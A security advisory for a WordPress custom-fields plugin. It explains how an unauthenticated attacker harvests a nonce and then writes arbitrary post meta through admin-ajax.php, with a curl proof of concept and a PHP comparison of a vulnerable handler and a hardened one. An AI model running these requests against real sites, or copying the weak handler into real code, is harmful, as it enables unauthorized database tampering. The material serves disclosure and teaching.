WCK – Custom Fields and Custom Post Types Creator [Unauthorized DB Access]

Description

The WordPress plugin WCK – Custom Fields and Custom Post Types Creator suffers from an unauthorized DB access vulnerability. An attacker can exploit the wck_add_form{$this->args['meta_name']} and wck_add_meta{$this->args['meta_name']} actions to insert arbitrary data into the database or update existing values.

If the attack succeeds, the attacker can insert data or update values in the postmeta DB table even without a valid account, as these actions are available to anyone through the wp_ajax_nopriv actions.

PoC

First the attacker must acquire a nonce value for the wck-add-meta action. This is possible through action=wck_add_formwck_cfc_fields, because the wck_add_form{$this->args['meta_name']} action is available to non-privileged users:
http://example.com/wp-admin/admin-ajax.php?action=wck_add_formwck_cfc_fields

The response is a form that contains the nonce in the .button-primary link, e.g.:

<a href="javascript:void(0)" class="button-primary" 
    onclick="addMeta('', '', 'f76ddf7b16')">
    <span>Add Entry</span>
</a>

With this nonce the attacker can exploit the wck_add_meta{$this->args['meta_name']} action to modify post meta directly in the DB, e.g.:

POST_ID=1
ACTION=wck_add_metawck_cfc_args
META_KEY="_meta_key_"
META_VALUE="pwnd"
NONCE="f76ddf7b16"

curl -d "_wpnonce=${NONCE}&action=${ACTION}&meta=${META_KEY}&values=${META_VALUE}&id=${POST_ID}" \
    "http://example.com/wp-admin/admin-ajax.php"
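The defensive counterpart to the Description and PoC above, added here as a hypothetical illustration and not the plugin's own code: an AJAX handler exposed through wp_ajax_nopriv_ that gates only on the nonce handed out by the publicly reachable form, beside a version that drops the nopriv registration and checks current_user_can('edit_post') on the target post. The hook names and function names are assumptions; the nonce action string wck-add-meta and the id/meta/values parameters come from the advisory.

```php
<?php
// Hypothetical illustration of the pattern behind this advisory (not the plugin's code).
// A nonce proves the request came from a form the client fetched; it says nothing about
// whether the caller is allowed to write to the post. When the form is served to anonymous
// users and the write handler is registered under wp_ajax_nopriv_, the nonce is all that
// stands between an unauthenticated client and update_post_meta().

// --- Weak pattern: nonce is the only gate, and the handler is reachable anonymously ---
add_action( 'wp_ajax_wck_add_meta_example',        'wck_example_add_meta_weak' );
add_action( 'wp_ajax_nopriv_wck_add_meta_example', 'wck_example_add_meta_weak' ); // anyone can call this

function wck_example_add_meta_weak() {
    check_ajax_referer( 'wck-add-meta', '_wpnonce' ); // passes for any client that fetched the form
    $post_id = (int) ( $_POST['id'] ?? 0 );
    update_post_meta( $post_id, sanitize_key( $_POST['meta'] ?? '' ), wp_unslash( $_POST['values'] ?? '' ) );
    wp_die();
}

// --- Hardened pattern: logged-in hook only, plus a capability check on the target post ---
add_action( 'wp_ajax_wck_add_meta_example_hardened', 'wck_example_add_meta_hardened' );

function wck_example_add_meta_hardened() {
    check_ajax_referer( 'wck-add-meta', '_wpnonce' ); // CSRF protection, not authorization

    $post_id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    // Authorization: the caller must be able to edit this specific post.
    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $key   = isset( $_POST['meta'] ) ? sanitize_key( $_POST['meta'] ) : '';
    $value = isset( $_POST['values'] ) ? sanitize_text_field( wp_unslash( $_POST['values'] ) ) : '';
    // Refuse empty keys and protected (underscore-prefixed) keys such as the _meta_key_ used in the PoC,
    // so the handler cannot be turned into a generic writer for internal post meta.
    if ( '' === $key || is_protected_meta( $key, 'post' ) ) {
        wp_send_json_error( 'invalid meta key', 400 );
    }

    update_post_meta( $post_id, $key, $value );
    wp_send_json_success();
}
```

Exposure of the data-modifying action through wp_ajax_nopriv_ is the root cause; the capability check and the protected-key refusal are defence in depth for callers who are logged in but should not be editing the post.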